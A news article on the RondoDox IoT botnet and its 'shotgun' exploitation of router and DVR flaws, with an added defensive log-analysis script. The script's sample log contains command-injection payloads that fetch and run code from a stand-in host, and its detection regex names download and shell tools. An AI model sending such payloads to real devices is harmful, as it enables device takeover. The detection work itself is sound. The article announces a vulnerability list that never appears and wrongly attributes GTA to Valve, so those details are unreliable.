Redazione RHC : 11 October 2025 08:15
A large botnet called RondoDox has been discovered exploiting 56 vulnerabilities in more than 30 different devices, including bugs first demonstrated during the Pwn2Own hacking competition.
Attackers target a wide range of Internet-accessible devices, including digital video recorders (DVRs), network video recorders (NVRs), video surveillance systems, and web servers.
RondoDox uses a strategy that Trend Micro researchers call a “shotgun exploit”: the malware fires multiple exploits at a target simultaneously to maximize the number of infections, even though this makes its activity highly visible.
Researchers report that, among other vulnerabilities, RondoDox attacks CVE-2023-1389, a bug in the TP-Link Archer AX21 Wi-Fi router, initially demonstrated at Pwn2Own Toronto 2022. They note that the botnet’s developers closely monitor the exploits demonstrated at Pwn2Own and then begin using them in practice.
Among the n-day vulnerabilities that RondoDox has already added to its arsenal are:
Experts write that older vulnerabilities, especially in devices that are past their support period, pose a serious problem, as they are less likely to receive patches. Newer issues with supported hardware are no less dangerous, as many users simply ignore firmware updates after the initial device setup.
Trend Micro analysts report that RondoDox uses exploits for 18 command injection vulnerabilities that have not yet been assigned a CVE identifier. These vulnerabilities affect D-Link NAS devices, TVT and LILIN DVRs, Fiberhome, ASMAX, and Linksys routers, Brickcom cameras, and other unspecified devices.
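The “shotgun” behaviour described above (one source firing many different exploits, most of them command injection, at whatever device endpoints it can reach) is itself a usable detection signal. The following is an added example, not code from the article or from Trend Micro: it parses combined-format web access logs, marks requests whose decoded query carries shell metacharacters or download/exec tokens, and flags source IPs that probe several distinct endpoints that way inside a short window. The log lines, IP addresses and endpoint paths are constructed for the example and do not correspond to any specific product or real exploit.

```python
"""Flag 'shotgun exploit' sources in web/IoT access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Heuristic markers of shell command injection in a request (assumption of
# this example, not a vendor signature): metacharacters plus common
# download/exec tokens seen in IoT botnet payloads.
INJECTION_MARKERS = re.compile(
    r"(;|\|\||&&|`|\$\(|\$\{IFS\})|\b(wget|curl|tftp|chmod|/bin/sh)\b",
    re.IGNORECASE,
)

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one noisy source hitting four different endpoints
# with injection payloads, one normal client, and one single-shot probe.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2025:14:02:01 +0000] "GET /cgi-bin/status.cgi?host=1.1.1.1;wget%20http://198.51.100.9/x HTTP/1.1" 200 12',
    '203.0.113.7 - - [10/Oct/2025:14:02:03 +0000] "POST /dvr/config?cmd=$(curl%20198.51.100.9) HTTP/1.1" 404 0',
    '203.0.113.7 - - [10/Oct/2025:14:02:04 +0000] "GET /nas/login.cgi?user=a`/bin/sh` HTTP/1.1" 401 0',
    '203.0.113.7 - - [10/Oct/2025:14:02:05 +0000] "GET /router/ping.cgi?ip=127.0.0.1||chmod%20777%20/tmp/x HTTP/1.1" 500 0',
    '198.51.100.22 - - [10/Oct/2025:14:03:10 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '192.0.2.5 - - [10/Oct/2025:14:03:12 +0000] "GET /cgi-bin/status.cgi?host=8.8.8.8;id HTTP/1.1" 200 12',
]


def parse_line(line):
    """Return a dict with ip, timestamp, decoded path and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "ts": ts,
        "path": unquote(m.group("path")),  # decode %20 etc. before matching
        "status": int(m.group("status")),
    }


def is_injection_attempt(path):
    """True if the decoded request path/query carries injection markers."""
    return bool(INJECTION_MARKERS.search(path))


def endpoint_of(path):
    """Strip the query string so distinct endpoints can be counted."""
    return path.split("?", 1)[0]


def find_shotgun_sources(lines, window=timedelta(minutes=5), min_endpoints=3):
    """Map each flagged source IP to the sorted distinct endpoints it probed.

    A source is flagged when, within `window`, it sends injection-style
    requests to at least `min_endpoints` different endpoints. A single probe
    against one endpoint is deliberately not enough; the point is the
    many-exploits-at-once pattern.
    """
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and is_injection_attempt(rec["path"]):
            events[rec["ip"]].append((rec["ts"], endpoint_of(rec["path"])))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        # Sliding window anchored at each event's timestamp.
        for i, (t0, _) in enumerate(evs):
            in_window = {ep for t, ep in evs[i:] if t - t0 <= window}
            if len(in_window) >= min_endpoints:
                flagged[ip] = sorted(in_window)
                break
    return flagged


if __name__ == "__main__":
    for ip, endpoints in find_shotgun_sources(SAMPLE_LOG).items():
        print(f"{ip}: injection attempts against {len(endpoints)} endpoints: {endpoints}")
```

The thresholds (five minutes, three endpoints) are starting points; on a real perimeter log they should be tuned against the baseline of scanner noise, and the marker regex will need extending for whatever encoding the devices in scope accept. Note that the response status is parsed but not used to decide: the botnet does not care whether a given exploit hit a matching device, so a burst of 404s is as telling as a 200.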
As previously reported by FortiGuard Labs, RondoDox is capable of launching DDoS attacks using HTTP, UDP, and TCP. To avoid detection, the botnet disguises its malicious traffic as popular games and platforms, including Minecraft, Dark and Darker, Roblox, DayZ, Fortnite, and Valve’s GTA, as well as tools like Discord, OpenVPN, WireGuard, and RakNet.
To protect against RondoDox attacks, researchers recommend installing the latest available firmware updates and promptly replacing out-of-date hardware. They also recommend segmenting the network, isolating critical data from internet-accessible IoT devices and guest connections, as well as changing default credentials and using strong passwords.